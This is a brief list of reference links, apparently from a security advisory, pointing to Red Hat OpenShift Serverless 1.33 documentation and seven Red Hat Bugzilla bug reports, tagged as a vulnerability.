https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.33  
https://bugzilla.redhat.com/show_bug.cgi?id=2253952  
https://bugzilla.redhat.com/show_bug.cgi?id=2262918  
https://bugzilla.redhat.com/show_bug.cgi?id=2264988  
https://bugzilla.redhat.com/show_bug.cgi?id=2264989  
https://bugzilla.redhat.com/show_bug.cgi?id=2266024  
https://bugzilla.redhat.com/show_bug.cgi?id=2266523  
https://bugzilla.redhat.com/show_bug.cgi?id=2266921

Tag

#vulnerability